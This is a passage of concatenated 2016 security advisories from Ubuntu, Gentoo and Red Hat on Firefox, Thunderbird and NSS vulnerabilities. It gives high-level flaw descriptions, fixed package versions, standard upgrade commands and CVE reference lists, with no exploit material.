modified\n whilst being read by the FileReader API. If a user were tricked in to\n opening a specially crafted website, an attacker could potentially exploit\n this to execute arbitrary code with the privileges of the user invoking\n Firefox. (CVE-2016-1963)\n \n Nicolas Gr=C3=A9goire discovered a use-after-free during XML transformations. \n If a user were tricked in to opening a specially crafted website, an\n attacker could potentially exploit this to cause a denial of service via\n application crash, or execute arbitrary code with the privileges of the\n user invoking Firefox. (CVE-2016-1964)\n \n Tsubasa Iinuma discovered a mechanism to cause the addressbar to display\n an incorrect URL, using history navigations and the Location protocol\n property. If a user were tricked in to opening a specially crafted\n website, an attacker could potentially exploit this to conduct URL\n spoofing attacks. (CVE-2016-1965)\n \n A memory corruption issues was discovered in the NPAPI subsystem. If\n a user were tricked in to opening a specially crafted website with a\n malicious plugin installed, an attacker could potentially exploit this\n to cause a denial of service via application crash, or execute arbitrary\n code with the privileges of the user invoking Firefox. (CVE-2016-1966)\n \n Jordi Chancel discovered a same-origin-policy bypass when using\n performance.getEntries and history navigation with session restore. If\n a user were tricked in to opening a specially crafted website, an attacker\n could potentially exploit this to steal confidential data. (CVE-2016-1967)\n \n Luke Li discovered a buffer overflow during Brotli decompression in some\n circumstances. If a user were tricked in to opening a specially crafted\n website, an attacker could potentially exploit this to cause a denial of\n service via application crash, or execute arbitrary code with the\n privileges of the user invoking Firefox. (CVE-2016-1968)\n \n Ronald Crane discovered a use-after-free in GetStaticInstance in WebRTC. \n If a user were tricked in to opening a specially crafted website, an\n attacker could potentially exploit this to cause a denial of service via\n application crash, or execute arbitrary code with the privileges of the\n user invoking Firefox. (CVE-2016-1973)\n \n Ronald Crane discovered an out-of-bounds read following a failed\n allocation in the HTML parser in some circumstances. If a user were\n tricked in to opening a specially crafted website, an attacker could\n potentially exploit this to cause a denial of service via application\n crash, or execute arbitrary code with the privileges of the user invoking\n Firefox. (CVE-2016-1974)\n \n Holger Fuhrmannek, Tyson Smith and Holger Fuhrmannek reported multiple\n memory safety issues in the Graphite 2 library. If a user were tricked in\n to opening a specially crafted website, an attacker could potentially\n exploit these to cause a denial of service via application crash, or\n execute arbitrary code with the privileges of the user invoking Firefox. \n (CVE-2016-1977, CVE-2016-2790, CVE-2016-2791, CVE-2016-2792,\n CVE-2016-2793, CVE-2016-2794, CVE-2016-2795, CVE-2016-2796, CVE-2016-2797,\n CVE-2016-2798, CVE-2016-2799, CVE-2016-2800, CVE-2016-2801, CVE-2016-2802)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 15.10:\n firefox 45.0.1+build1-0ubuntu0.15.10.2\n\nUbuntu 14.04 LTS:\n firefox 45.0.1+build1-0ubuntu0.14.04.2\n\nUbuntu 12.04 LTS:\n firefox 45.0.1+build1-0ubuntu0.12.04.2\n\nAfter a standard system update you need to restart Firefox to make\nall the necessary changes. \n\nReferences:\n http://www.ubuntu.com/usn/usn-2917-2\n http://www.ubuntu.com/usn/usn-2917-1\n https://launchpad.net/bugs/1567671\n\nPackage Information:\n https://launchpad.net/ubuntu/+source/firefox/45.0.1+build1-0ubuntu0.15.10.2\n https://launchpad.net/ubuntu/+source/firefox/45.0.1+build1-0ubuntu0.14.04.2\n https://launchpad.net/ubuntu/+source/firefox/45.0.1+build1-0ubuntu0.12.04.2\n. The\nSeaMonkey project is a community effort to deliver production-quality\nreleases of code derived from the application formerly known as\n\u0027Mozilla Application Suite\u0027. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-libs/nspr \u003c 4.12 \u003e= 4.12\n 2 dev-libs/nss \u003c 3.22.2 \u003e= 3.22.2\n 3 mail-client/thunderbird \u003c 38.7.0 \u003e= 38.7.0\n 4 mail-client/thunderbird-bin\n \u003c 38.7.0 \u003e= 38.7.0\n 5 www-client/firefox \u003c 38.7.0 \u003e= 38.7.0\n 6 www-client/firefox-bin \u003c 38.7.0 \u003e= 38.7.0\n -------------------------------------------------------------------\n 6 affected packages\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in Firefox, NSS, NSPR,\nand Thunderbird. Please review the CVE identifiers referenced below for\ndetails. Furthermore, a remote attacker may be able\nto perform Man-in-the-Middle attacks, obtain sensitive information,\nspoof the address bar, conduct clickjacking attacks, bypass security\nrestrictions and protection mechanisms, or have other unspecified\nimpacts. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll NSS users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/nss-3.22.2\"\n\nAll Thunderbird users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=mail-client/thunderbird-38.7.0\"=\n\n\nAll users of the Thunderbird binary package should upgrade to the\nlatest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=mail-client/thunderbird-bin-38.7.0\"\n\nAll Firefox 38.7.x users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=www-client/firefox-38.7.0\"\n\nAll users of the Firefox 38.7.x binary package should upgrade to the\nlatest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=www-client/firefox-bin-38.7.0\"\n\nReferences\n==========\n\n[ 1 ] CVE-2015-2708\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2708\n[ 2 ] CVE-2015-2708\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2708\n[ 3 ] CVE-2015-2709\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2709\n[ 4 ] CVE-2015-2709\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2709\n[ 5 ] CVE-2015-2710\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2710\n[ 6 ] CVE-2015-2710\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2710\n[ 7 ] CVE-2015-2711\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2711\n[ 8 ] CVE-2015-2711\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2711\n[ 9 ] CVE-2015-2712\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2712\n[ 10 ] CVE-2015-2712\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2712\n[ 11 ] CVE-2015-2713\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2713\n[ 12 ] CVE-2015-2713\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2713\n[ 13 ] CVE-2015-2714\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2714\n[ 14 ] CVE-2015-2714\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2714\n[ 15 ] CVE-2015-2715\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2715\n[ 16 ] CVE-2015-2715\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2715\n[ 17 ] CVE-2015-2716\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2716\n[ 18 ] CVE-2015-2716\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2716\n[ 19 ] CVE-2015-2717\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2717\n[ 20 ] CVE-2015-2717\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2717\n[ 21 ] CVE-2015-2718\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2718\n[ 22 ] CVE-2015-2718\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2718\n[ 23 ] CVE-2015-4473\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4473\n[ 24 ] CVE-2015-4473\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4473\n[ 25 ] CVE-2015-4474\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4474\n[ 26 ] CVE-2015-4474\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4474\n[ 27 ] CVE-2015-4475\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4475\n[ 28 ] CVE-2015-4475\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4475\n[ 29 ] CVE-2015-4477\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4477\n[ 30 ] CVE-2015-4477\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4477\n[ 31 ] CVE-2015-4478\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4478\n[ 32 ] CVE-2015-4478\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4478\n[ 33 ] CVE-2015-4479\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4479\n[ 34 ] CVE-2015-4479\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4479\n[ 35 ] CVE-2015-4480\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4480\n[ 36 ] CVE-2015-4480\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4480\n[ 37 ] CVE-2015-4481\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4481\n[ 38 ] CVE-2015-4481\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4481\n[ 39 ] CVE-2015-4482\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4482\n[ 40 ] CVE-2015-4482\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4482\n[ 41 ] CVE-2015-4483\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4483\n[ 42 ] CVE-2015-4483\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4483\n[ 43 ] CVE-2015-4484\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4484\n[ 44 ] CVE-2015-4484\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4484\n[ 45 ] CVE-2015-4485\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4485\n[ 46 ] CVE-2015-4485\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4485\n[ 47 ] CVE-2015-4486\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4486\n[ 48 ] CVE-2015-4486\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4486\n[ 49 ] CVE-2015-4487\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4487\n[ 50 ] CVE-2015-4487\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4487\n[ 51 ] CVE-2015-4488\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4488\n[ 52 ] CVE-2015-4488\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4488\n[ 53 ] CVE-2015-4489\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4489\n[ 54 ] CVE-2015-4489\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4489\n[ 55 ] CVE-2015-4490\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4490\n[ 56 ] CVE-2015-4490\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4490\n[ 57 ] CVE-2015-4491\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4491\n[ 58 ] CVE-2015-4491\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4491\n[ 59 ] CVE-2015-4492\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4492\n[ 60 ] CVE-2015-4492\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4492\n[ 61 ] CVE-2015-4493\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4493\n[ 62 ] CVE-2015-4493\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4493\n[ 63 ] CVE-2015-7181\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7181\n[ 64 ] CVE-2015-7182\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7182\n[ 65 ] CVE-2015-7183\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7183\n[ 66 ] CVE-2016-1523\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1523\n[ 67 ] CVE-2016-1523\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1523\n[ 68 ] CVE-2016-1930\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1930\n[ 69 ] CVE-2016-1930\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1930\n[ 70 ] CVE-2016-1931\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1931\n[ 71 ] CVE-2016-1931\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1931\n[ 72 ] CVE-2016-1933\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1933\n[ 73 ] CVE-2016-1933\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1933\n[ 74 ] CVE-2016-1935\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1935\n[ 75 ] CVE-2016-1935\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1935\n[ 76 ] CVE-2016-1937\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1937\n[ 77 ] CVE-2016-1937\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1937\n[ 78 ] CVE-2016-1938\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1938\n[ 79 ] CVE-2016-1938\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1938\n[ 80 ] CVE-2016-1939\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1939\n[ 81 ] CVE-2016-1939\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1939\n[ 82 ] CVE-2016-1940\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1940\n[ 83 ] CVE-2016-1940\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1940\n[ 84 ] CVE-2016-1941\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1941\n[ 85 ] CVE-2016-1941\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1941\n[ 86 ] CVE-2016-1942\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1942\n[ 87 ] CVE-2016-1942\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1942\n[ 88 ] CVE-2016-1943\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1943\n[ 89 ] CVE-2016-1943\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1943\n[ 90 ] CVE-2016-1944\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1944\n[ 91 ] CVE-2016-1944\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1944\n[ 92 ] CVE-2016-1945\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1945\n[ 93 ] CVE-2016-1945\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1945\n[ 94 ] CVE-2016-1946\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1946\n[ 95 ] CVE-2016-1946\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1946\n[ 96 ] CVE-2016-1947\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1947\n[ 97 ] CVE-2016-1947\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1947\n[ 98 ] CVE-2016-1948\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1948\n[ 99 ] CVE-2016-1948\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1948\n[ 100 ] CVE-2016-1949\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1949\n[ 101 ] CVE-2016-1949\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1949\n[ 102 ] CVE-2016-1950\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1950\n[ 103 ] CVE-2016-1950\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1950\n[ 104 ] CVE-2016-1952\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1952\n[ 105 ] CVE-2016-1952\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1952\n[ 106 ] CVE-2016-1953\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1953\n[ 107 ] CVE-2016-1953\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1953\n[ 108 ] CVE-2016-1954\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1954\n[ 109 ] CVE-2016-1954\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1954\n[ 110 ] CVE-2016-1955\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1955\n[ 111 ] CVE-2016-1955\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1955\n[ 112 ] CVE-2016-1956\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1956\n[ 113 ] CVE-2016-1956\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1956\n[ 114 ] CVE-2016-1957\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1957\n[ 115 ] CVE-2016-1957\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1957\n[ 116 ] CVE-2016-1958\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1958\n[ 117 ] CVE-2016-1958\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1958\n[ 118 ] CVE-2016-1959\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1959\n[ 119 ] CVE-2016-1959\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1959\n[ 120 ] CVE-2016-1960\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1960\n[ 121 ] CVE-2016-1960\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1960\n[ 122 ] CVE-2016-1961\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1961\n[ 123 ] CVE-2016-1961\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1961\n[ 124 ] CVE-2016-1962\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1962\n[ 125 ] CVE-2016-1962\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1962\n[ 126 ] CVE-2016-1963\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1963\n[ 127 ] CVE-2016-1963\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1963\n[ 128 ] CVE-2016-1964\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1964\n[ 129 ] CVE-2016-1964\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1964\n[ 130 ] CVE-2016-1965\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1965\n[ 131 ] CVE-2016-1965\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1965\n[ 132 ] CVE-2016-1966\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1966\n[ 133 ] CVE-2016-1966\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1966\n[ 134 ] CVE-2016-1967\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1967\n[ 135 ] CVE-2016-1967\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1967\n[ 136 ] CVE-2016-1968\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1968\n[ 137 ] CVE-2016-1968\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1968\n[ 138 ] CVE-2016-1969\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1969\n[ 139 ] CVE-2016-1969\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1969\n[ 140 ] CVE-2016-1970\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1970\n[ 141 ] CVE-2016-1970\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1970\n[ 142 ] CVE-2016-1971\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1971\n[ 143 ] CVE-2016-1971\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1971\n[ 144 ] CVE-2016-1972\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1972\n[ 145 ] CVE-2016-1972\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1972\n[ 146 ] CVE-2016-1973\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1973\n[ 147 ] CVE-2016-1973\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1973\n[ 148 ] CVE-2016-1974\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1974\n[ 149 ] CVE-2016-1974\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1974\n[ 150 ] CVE-2016-1975\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1975\n[ 151 ] CVE-2016-1975\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1975\n[ 152 ] CVE-2016-1976\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1976\n[ 153 ] CVE-2016-1976\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1976\n[ 154 ] CVE-2016-1977\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1977\n[ 155 ] CVE-2016-1977\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1977\n[ 156 ] CVE-2016-1978\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1978\n[ 157 ] CVE-2016-1978\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1978\n[ 158 ] CVE-2016-1979\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1979\n[ 159 ] CVE-2016-1979\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1979\n[ 160 ] CVE-2016-2790\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2790\n[ 161 ] CVE-2016-2790\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2790\n[ 162 ] CVE-2016-2791\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2791\n[ 163 ] CVE-2016-2791\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2791\n[ 164 ] CVE-2016-2792\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2792\n[ 165 ] CVE-2016-2792\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2792\n[ 166 ] CVE-2016-2793\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2793\n[ 167 ] CVE-2016-2793\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2793\n[ 168 ] CVE-2016-2794\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2794\n[ 169 ] CVE-2016-2794\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2794\n[ 170 ] CVE-2016-2795\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2795\n[ 171 ] CVE-2016-2795\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2795\n[ 172 ] CVE-2016-2796\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2796\n[ 173 ] CVE-2016-2796\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2796\n[ 174 ] CVE-2016-2797\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2797\n[ 175 ] CVE-2016-2797\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2797\n[ 176 ] CVE-2016-2798\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2798\n[ 177 ] CVE-2016-2798\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2798\n[ 178 ] CVE-2016-2799\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2799\n[ 179 ] CVE-2016-2799\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2799\n[ 180 ] CVE-2016-2800\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2800\n[ 181 ] CVE-2016-2800\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2800\n[ 182 ] CVE-2016-2801\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2801\n[ 183 ] CVE-2016-2801\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2801\n[ 184 ] CVE-2016-2802\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2802\n[ 185 ] CVE-2016-2802\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2802\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201605-06\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n\n--Bs4bwglUWSbluQjJQQ051Q7fVoU1XxLw6\n. 5 client) - i386, x86_64\n\n3. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Critical: nss-util security update\nAdvisory ID: RHSA-2016:0495-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-0495.html\nIssue date: 2016-03-23\nCVE Names: CVE-2016-1950 \n=====================================================================\n\n1. Summary:\n\nUpdated nss-util packages that fix one security issue are now available for\nRed Hat Enterprise Linux 6.2, 6.4, and 6.5 Advanced Update Support, and Red\nHat Enterprise Linux 6.6 and 7.1 Extended Update Support. \n\nRed Hat Product Security has rated this update as having Critical security\nimpact. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available from the CVE link in the\nReferences section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux ComputeNode EUS (v. 7.1) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional EUS (v. 7.1) - x86_64\nRed Hat Enterprise Linux HPC Node EUS (v. 6.6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional EUS (v. 6.6) - x86_64\nRed Hat Enterprise Linux Server AUS (v. 6.2) - x86_64\nRed Hat Enterprise Linux Server AUS (v. 6.4) - x86_64\nRed Hat Enterprise Linux Server AUS (v. 6.5) - x86_64\nRed Hat Enterprise Linux Server EUS (v. 6.6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server EUS (v. 7.1) - ppc64, ppc64le, s390x, x86_64\n\n3. Description:\n\nNetwork Security Services (NSS) is a set of libraries designed to support\nthe cross-platform development of security-enabled client and server\napplications. The nss-util package provides a set of utilities for NSS and\nthe Softoken module. \n\nA heap-based buffer overflow flaw was found in the way NSS parsed certain\nASN.1 structures. (CVE-2016-1950)\n\nRed Hat would like to thank the Mozilla project for reporting this issue. \nUpstream acknowledges Francis Gabriel as the original reporter. \n\nAll nss-util users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all applications linked to the nss and nss-util libraries must be\nrestarted, or the system rebooted. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1310509 - CVE-2016-1950 nss: Heap buffer overflow vulnerability in ASN1 certificate parsing (MFSA 2016-35)\n\n6. Package List:\n\nRed Hat Enterprise Linux HPC Node EUS (v. 6.6):\n\nSource:\nnss-util-3.19.1-3.el6_6.src.rpm\n\nx86_64:\nnss-util-3.19.1-3.el6_6.i686.rpm\nnss-util-3.19.1-3.el6_6.x86_64.rpm\nnss-util-debuginfo-3.19.1-3.el6_6.i686.rpm\nnss-util-debuginfo-3.19.1-3.el6_6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional EUS (v. 6.6):\n\nx86_64:\nnss-util-debuginfo-3.19.1-3.el6_6.i686.rpm\nnss-util-debuginfo-3.19.1-3.el6_6.x86_64.rpm\nnss-util-devel-3.19.1-3.el6_6.i686.rpm\nnss-util-devel-3.19.1-3.el6_6.x86_64.rpm\n\nRed Hat Enterprise Linux Server AUS (v. 6.2):\n\nSource:\nnss-util-3.13.1-10.el6_2.src.rpm\n\nx86_64:\nnss-util-3.13.1-10.el6_2.i686.rpm\nnss-util-3.13.1-10.el6_2.x86_64.rpm\nnss-util-debuginfo-3.13.1-10.el6_2.i686.rpm\nnss-util-debuginfo-3.13.1-10.el6_2.x86_64.rpm\nnss-util-devel-3.13.1-10.el6_2.i686.rpm\nnss-util-devel-3.13.1-10.el6_2.x86_64.rpm\n\nRed Hat Enterprise Linux Server AUS (v. 6.4):\n\nSource:\nnss-util-3.14.3-8.el6_4.src.rpm\n\nx86_64:\nnss-util-3.14.3-8.el6_4.i686.rpm\nnss-util-3.14.3-8.el6_4.x86_64.rpm\nnss-util-debuginfo-3.14.3-8.el6_4.i686.rpm\nnss-util-debuginfo-3.14.3-8.el6_4.x86_64.rpm\nnss-util-devel-3.14.3-8.el6_4.i686.rpm\nnss-util-devel-3.14.3-8.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux Server AUS (v. 